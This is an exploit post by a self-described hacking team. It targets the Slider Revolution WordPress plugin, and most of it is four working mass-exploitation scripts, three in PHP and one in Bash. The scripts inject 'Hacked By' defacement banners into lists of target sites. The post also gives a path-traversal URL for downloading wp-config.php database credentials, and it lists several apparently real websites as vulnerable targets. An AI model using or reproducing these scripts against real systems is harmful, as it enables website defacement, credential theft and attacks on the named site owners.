############################################################################################ # Exploit Title : WordPress 5.1.1 Slider Revolution 4.6.5 UpdateCaptionsCSS Remote Content Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Published Date : 20/03/2019 # Vulnerability Discovered Date : 2013 - 2014 # Vendor Homepage : revolution.themepunch.com - codecanyon.net # Software Information Link : codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380 # Software Affected Versions : 4.x.x - 5.x.x with Software 4.6.5 and lower versions # Software Price Type : Paid Download - 26$ # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Cyberizm Reference Link : cyberizm.org/cyberizm-wordpress-revslider-get-caption-css-exploit.html ############################################################################################ # Description about Software : *************************** Slider Revolution (Revolution Slider) is an innovative, responsive WordPress Slider Plugin that displays your content the beautiful way. Whether it’s a Slider, Carousel, Hero Image or Video Scene for best conversion rates or even a whole Front Page, the visual, drag & drop editor will let you tell your own stories in no time! Desktop or mobile device! Note : This Exploit was used in 2014 - 2015 exploited in the wild but it was not shared so in details. That's why I made it public. ############################################################################################ # Impact : *********** The software constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component and this is called as content injection. ############################################################################################ # Explanation for Vulnerability : ******************************** # Vulnerability : ************ /wp-content/plugins/revslider/revslider_admin.php /wp-admin/admin-ajax.php "action" => "revslider_ajax_action", "client_action" => "update_captions_css", # Vulnerability Message : ************************* {"success":false,"message":"Wrong request"} # Vulnerability Error for Successfull Exploitation : ***************************************** {"success":true,"message":"","data":" # Directory File Destination : ************************ /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css # Vulnerable Source Code : ************************ 232. $action = self::getPostGetVar("client_action"); 233. $data = self::getPostGetVar("data"); ... 301. case "get_captions_css": 302. $contentCSS = $operations->getCaptionsContent(); 303. self::ajaxResponseData($contentCSS); ... 305. case "update_captions_css": 306. $arrCaptions = $operations->updateCaptionsContentData($data); 307. self::ajaxResponseSuccess("CSS file saved succesfully!",array("arrCaptions"=>$arrCaptions)) # Database Configuration File Download : ************************************ /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php Informations About MySQL Database Configuration File => **************************************************** ** The name of the database for WordPress */ define('DB_NAME', ''); /** MySQL database username */ define('DB_USER', ''); /** MySQL database password */ define('DB_PASSWORD', ''); /** MySQL hostname */ define('DB_HOST', ''); Note : Use Auto PHP and Bash Exploiter to use this Vulnerability. ############################################################################################ # Content Injection PHP Exploiter 1: ******************************** <b>..::|| Wordpress Revslider UpdateCaptionsCSS GetCaptionsCSS Content Injection Exploiter ||::..</b> <?php /* [#]Coded By : KingSkrupellos [#]www.cyberizm.org */ //====================================================== @error_reporting(0); @set_time_limit(0); //====================================================== echo'<form method="post"> <textarea name="s" cols="50" rows="13" ></textarea><br> <input type="submit" name="g" value="GO" /> </form>'; //======================================================= if(isset($_POST['g']) and !empty($_POST['s'])){ $urls = explode("\r\n",$_POST['s']); foreach($urls as $url){ $url = trim($url); $post = array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<h2>Hacked By KingSkrupellos Cyberizm Digital Security Army<br>:)<br>"); $site = $url."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"; $ch = curl_init(); curl_setopt($ch,CURLOPT_URL, $site); curl_setopt($ch,CURLOPT_RETURNTRANSFER, true); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS,$post); curl_setopt($ch,CURLOPT_TIMEOUT,30); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0); $cn = curl_exec($ch); $fcn = @file_get_contents($site); if(eregi('hacked',$fcn)){ echo "<b>[#] $url : done <a href=\"$site\">HERE</a></b><br>"; }else{ echo"[!]$url : failed<br>"; } } } //========================= \!/ Mission Accomplished \!/ ====================================================// ?> ############################################################################################ # Content Injection PHP Exploiter 2 : ********************************* <?php echo "\n+-------------------------------------------+\n"; echo "| Cyberizm Digital Security Army |\n"; echo "| www.cyberizm.org |\n"; echo "+-------------------------------------------+\n"; $gv=@file_get_contents($argv[1]); $exv=explode("\r\n",$gv); echo "\n\t Total site loaded : ".count($exv)."\n\n"; foreach($exv as $url){ echo "\n[+]Scaning : $url \n"; dr($url); } function dr($site){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "".$site."/wp-admin/admin-ajax.php"); curl_setopt($ch, CURLOPT_USERAGENT, $agent); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Team<p style='color: transparent'>")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $result = curl_exec($ch); if (eregi('true', $result)) $path="$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"; $gett=@file_get_contents($path); if(preg_match('/Hacked by KingSkrupellos Cyberizm Digital Security Army/',$gett)){ echo "\n[+]Exploit Done \n[+]shell : $path \n\n "; $fo = fopen("finish.txt","a+"); $r = fwrite($fo,"".$path."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css\r\n"); fclose($fo); } else { echo "| ".$site . " : Not Revslider \n\n"; } curl_close($ch); } echo "\n[-]Exploit Fail \n\n"; } } ?> ############################################################################################ # Content Injection Bash Exploiter 3 : ********************************* #!/bin/bash #coded = IBT SS(){ curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \ -H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \ -H "Accept-Language: en-us,en;q=0.5" \ -H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \ -F "client_action=update_captions_css" \ -F "action=revslider_ajax_action" \ -F "data=x$(cat tmp/s.txt)" \ --request POST "http://${1}/wp-admin/admin-ajax.php" } CD(){ if [ -f tmp/cd.txt ];then rm -f tmp/cd.txt fi curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" -o tmp/cd.txt if [ ! -f tmp/cd.txt ];then echo "--> $urlnya : not vuln" continue fi cat tmp/cd.txt | grep -i "KingSkrupellos" > /dev/null;cd=$? if [ $cd -eq 0 ];then echo "--> ${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css : exploit success" echo "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" >> success.txt else echo "--> $urlnya : exploit failed" fi } CV(){ if [ -f tmp/cv.txt ];then rm -f tmp/cv.txt fi curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action" -o tmp/cv.txt if [ ! -f tmp/cv.txt ];then echo "--> $urlnya : not vuln" continue fi cat tmp/cv.txt | grep "wrong ajax action:" > /dev/null;cv=$? if [ $cv -eq 1 ];then echo "--> $urlnya : not vuln" continue else echo "--> $urlnya : found revslider" fi } Exp(){ for url in `cat $list` do urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1' | awk '{gsub("//","/")}1') if [ ! -f load.txt ];then touch load.txt fi cat load.txt | grep "$urlnya" > /dev/null;ccl=$? if [ $ccl -eq 1 ];then echo $urlnya >> load.txt else #udah pernah di load di file load.txt #kalau mau load ulang,silakan hapus file load.txt continue fi echo "--> $urlnya : check" CV $urlnya SS $urlnya CD $urlnya done } Lengkap(){ if [ ! -f $list ];then echo "[!] $list not exist" exit fi if [ ! -d tmp ];then mkdir tmp fi if [ ! -f tmp/s.txt ];then cat > tmp/s.txt <<_script <body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Army<p style='color: transparent'> _script fi Exp } read -p "[+] Enter list target = " list Lengkap ############################################################################################ # Content Injection PHP Exploiter 4 : ********************************* <?php $post = array ( "action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<marquee>Hacked By KingSkrupellos Cyberizm Digital Security Army</marquee>" ); $ch = curl_init ("http://localhost/wp-admin/admin-ajax.php"); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch, CURLOPT_POST, 1); curl_setopt ($ch, CURLOPT_POSTFIELDS, $post); $data = curl_exec ($ch); curl_close ($ch); ?> ############################################################################################ # Example Vulnerable Sites : ************************* [+] filature-lille.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css [+] daniperezrun.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css [+] bilateralsolutions.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css [+] blog.acquaesapone.it/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css [+] new.med.com.do/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css [+] en.neural.co.jp/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css ############################################################################################ # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ############################################################################################